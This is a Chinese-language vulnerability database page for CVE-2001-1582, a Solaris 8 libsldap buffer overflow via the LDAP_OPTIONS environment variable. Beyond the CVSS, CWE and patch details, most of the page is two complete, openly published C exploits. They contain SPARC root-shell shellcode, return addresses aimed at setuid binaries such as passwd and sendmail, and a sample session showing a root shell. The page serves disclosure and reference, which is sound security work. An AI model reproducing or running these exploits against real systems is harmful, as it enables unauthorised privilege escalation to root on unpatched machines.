CVE-2001-1582
CVSS7.2
发布时间 :2001-12-31 00:00:00
修订时间 :2008-09-05 00:00:00
NMCOE    

[原文]Buffer overflow in the LDAP naming services library (libsldap) in Sun Solaris 8 allows local users to execute arbitrary code via a long LDAP_OPTIONS environment variable to a privileged program that uses libsldap.


[CNNVD]Solaris libsldap缓冲区溢出漏洞(CNNVD-200112-240)

        Sun Solaris 8 的LDAP命名服务库(libsldap)存在漏洞。本地用户可以借助使用libsldap的程序的超长LDAP_OPTIONS环境变量执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:8.0:unkown:x86

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1582
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1582
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-240
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2931
(PATCH)  BID  2931
http://www.securiteam.com/unixfocus/5IP0O2A4KS.html
(UNKNOWN)  MISC  http://www.securiteam.com/unixfocus/5IP0O2A4KS.html
http://seclists.org/bugtraq/2001/Jun/0365.html
(UNKNOWN)  BUGTRAQ  20010626 Solaris 8 libsldap buffer overflow
http://seclists.org/bugtraq/2001/Jul/0091.html
(UNKNOWN)  BUGTRAQ  20010706 Re: Solaris 8 libsldap exploit
http://seclists.org/bugtraq/2001/Jul/0077.html
(UNKNOWN)  BUGTRAQ  20010705 Solaris 8 libsldap exploit

- 漏洞信息

Solaris libsldap缓冲区溢出漏洞
高危 缓冲区溢出
2001-12-31 00:00:00 2007-10-03 00:00:00
本地  
        Sun Solaris 8 的LDAP命名服务库(libsldap)存在漏洞。本地用户可以借助使用libsldap的程序的超长LDAP_OPTIONS环境变量执行任意代码。

- 公告与补丁

        Sun has released fixes for Sparc and x86 versions of Solaris.
        Sun Solaris 8_x86
        

  •         Sun 111091-03
            

  •         

        Sun Solaris 8
        

- 漏洞信息 (20969)

Solaris 8 libsldap Buffer Overflow Vulnerability (1) (EDBID:20969)
solaris local
2001-06-26 Verified
0 noir
N/A [点击下载]
source: http://www.securityfocus.com/bid/2931/info

Solaris 8 ships with a shared library that implements LDAP functionality called 'libsldap'. This library is linked to by a number of system utilities, many of them installed setuid or setgid.

Libsldap contains a buffer overflow vulnerability in it's handling of the 'LDAP_OPTIONS' environment variable.

Local attackers can exploit this vulnerability in setuid/setgid programs linked to libsldap to elevate privileges. 

/** !!!PRIVATE!!! 
 ** noir@gsu.linux.org.tr
 ** libsldap.so.1 $LDAP_OPTIONS enviroment variable overflow exploit;
 ** 
 **/
  
#include <stdio.h>

#define ADJUST      1


/* anathema@hack.co.za
** Solaris/SPARC shellcode
** setreuid(0, 0); setregid(0, 0); execve("/bin/sh", args, 0);
*/

char shellcode[] =
"\x90\x1a\x40\x09\x92\x1a\x40\x09\x82\x10\x20\xca\x91\xd0\x20\x08"
"\x90\x1a\x40\x09\x92\x1a\x40\x09\x82\x10\x20\xcb\x91\xd0\x20\x08"
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08";

struct type {
char *string;
char *path;
long retaddr;
};

struct type target[] = 
      {
	{ "0, /usr/bin/passwd Solaris8, Sparc64", "/usr/bin/passwd", 0xffbefe98 },
	{ "1, /usr/bin/nispasswd Solaris8, Sparc64", "/usr/bin/nispasswd", 0xffbefe98 },
	{ "2, /usr/bin/yppasswd Solaris8, Sparc64", "/usr/bin/yppasswd", 0xffbefe98 },
	{ "3, /usr/bin/chkey Solaris8, Sparc64 ", "/usr/bin/chkey", 0xffbefea8 },
	{ "4, /usr/lib/sendmail Solaris8, Sparc64", "/usr/lib/sendmail", 0xffbefeb8 },
	{ NULL, NULL, 0 } 
      };

int i;
unsigned long ret_adr;
char ldap[4000];
char egg[400];
char *envs[] = { ldap, egg, NULL };

main(int argc, char *argv[])
{

      if(!argv[1])
      {
              fprintf(stderr, "libsldap.so.1 $LDAP_OPTIONS enviroment variable \
buffer overflow\nExploit code: noir@gsu.linux.org.tr\nBug discovery: sway@hack.co.za\n\nUsage: %s target#\n\n", argv[0]);
      for(i = 0; target[i].string != NULL; i++)
      fprintf(stderr,"target#: %s\n", target[i].string);
      exit(0); 
      }

  ret_adr = target[atoi(argv[1])].retaddr;
 
  memset(egg, 0x00, sizeof egg);
  for(i = 0 ; i < 400 - strlen(shellcode) ; i +=4)
  *(long *)&egg[i] =  0xa61cc013; 
  for (i= 0 ; i < strlen(shellcode); i++) 
     egg[200+i]=shellcode[i];
  
 for ( i = 0; i <  ADJUST; i++) ldap[i]=0x58;
 for (i = ADJUST; i < 4000; i+=4)
    {
      ldap[i+3]=ret_adr & 0xff;
      ldap[i+2]=(ret_adr >> 8 ) &0xff;
      ldap[i+1]=(ret_adr >> 16 ) &0xff;
      ldap[i+0]=(ret_adr >> 24 ) &0xff;
    }
memcpy(ldap, "LDAP_OPTIONS=", 13);
 
ldap[strlen(ldap) - 3] = 0x00; //ldap[3998] has to be NULL terminated

execle(target[atoi(argv[1])].path, "12341234", (char *)0, envs);

}


		

- 漏洞信息 (20970)

Solaris 8 libsldap Buffer Overflow Vulnerability (2) (EDBID:20970)
solaris local
2001-06-27 Verified
0 Fyodor
N/A [点击下载]
source: http://www.securityfocus.com/bid/2931/info
 
Solaris 8 ships with a shared library that implements LDAP functionality called 'libsldap'. This library is linked to by a number of system utilities, many of them installed setuid or setgid.
 
Libsldap contains a buffer overflow vulnerability in it's handling of the 'LDAP_OPTIONS' environment variable.
 
Local attackers can exploit this vulnerability in setuid/setgid programs linked to libsldap to elevate privileges. 

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>


/* $Id: ldap_exp2.c,v 1.1 2001/06/27 23:01:04 fygrave Exp $
 *
 * victim% ./lod -s 316 -p 5
 * jumping into: ffbefe74 (buf size: 156, soff: 316, stack: ffbefd38)
 * # id
 * uid=0(root) gid=200(em) egid=3(sys)
 * # uname -a
 * SunOS victim 5.8 Generic_108528-06 sun4u sparc SUNW,Ultra-60
 * # ^D
 * victim%
 * Thu Jun 28 05:22:38 ICT 2001
 * Fyodor <fygrave@tigerteam.net>
 */

#define NOP "\x80\x1c\x40\x11"
#define BUFSIZE 156
#define LOCALBUF 10000
#define NOPS     1964
#define PAD 3
#define SOFF 664

char shellcode[]=

"\x90\x1a\x40\x09"  /*  xor  %o1, %o1, %o0 */
"\x82\x10\x20\x17"  /*  mov  0x17, %g1 */
"\x91\xd0\x20\x08"  /*  ta  8 */
"\x20\xbf\xff\xff"  /*  bn,a   0x108b4 <main+8> */
"\x20\xbf\xff\xff"  /*  bn,a   0x108b8 <maino> */
"\x7f\xff\xff\xff"  /*  call  0x108bc <shellcode> */
"\x90\x03\xe0\x30"  /*  add  %o7, 0x30, %o0 */
"\x92\x03\xe0\x28"  /*  add  %o7, 0x28, %o1 */
"\xc0\x2b\xe0\x38"  /*  clrb  [ %o7 + 0x38 ] */
"\xd0\x23\xe0\x28"  /*  st  %o0, [ %o7 + 0x28 ] */
"\xc0\x23\xe0\x2c"  /*  clr  [ %o7 + 0x2c ] */
"\x82\x10\x20\x0b"  /*  mov  0xb, %g1 */
"\x91\xd0\x20\x08"  /*  ta  8 */
"\x82\x10\x20\x01"  /*  mov  1, %g1 */
"\x91\xd0\x20\x08"  /*  ta  8 */
"\x41\x41\x41\x41"  /*  AAAA */
"\x41\x41\x41\x41"  /*  AAAA */
"\x2f\x62\x69\x6e"  /*  /bin */
"\x2f\x6b\x73\x68"  /*  /ksh */
"\x41\x57\x68\x6f";  /*  junk */

extern char *optarg;

unsigned long get_sp(void) {

   __asm__("mov %sp,%i0 \n");

}

int main(int argc, char **argv) {

    static    char buf[LOCALBUF], *ptr;
    unsigned long addr, bufsize, soff, pad;
    int i, c;

    soff = SOFF;
    bufsize = BUFSIZE;
    pad = PAD;

    while((c = getopt(argc, argv, "s:b:p:h")) !=EOF) 
        switch(c) {
            case 'b':
                bufsize = strtoul(optarg,NULL,0); 
                break;
            case 's':
                soff = strtoul(optarg,NULL,0); 
                break;
            case 'p':
                pad = strtoul(optarg,NULL,0);
                break;    
            case 'h':
            default:
                fprintf(stderr,"usage: %s [-b buffsize] [-s stackoff] [-p pad]\n",
                argv[0]);
                exit(1);
        }
	
    
    bzero(buf, sizeof(buf));

    strcpy(buf,"LDAP_OPTIONS=");
    ptr=buf + strlen(buf);
    
    for(i=0;i<bufsize;i++, ptr++) *ptr='A';

    addr = get_sp() + soff;
    memcpy(ptr,(char *)&addr, 4);
    memcpy(ptr+4,(char *)&addr, 4);
    ptr+=8;

    for(i=0;i<pad;i++, ptr++) *ptr='A';
    for(i=0;i<NOPS;i++, ptr+=4) memcpy(ptr, NOP, 4);
    strcat(buf, shellcode);

    putenv(buf);
    fprintf(stderr,"jumping into: %lx (buf size: %i, soff: %i, stack: %lx)\n",
        addr, bufsize, soff, get_sp());

    execl("/bin/passwd","lameswd",0);
}
		

- 漏洞信息

45904
Solaris LDAP Naming Services Library (libsldap) LDAP_OPTIONS Environment Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Vendor Verified

- 漏洞描述

- 时间线

2001-06-27 Unknow
2001-06-27 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站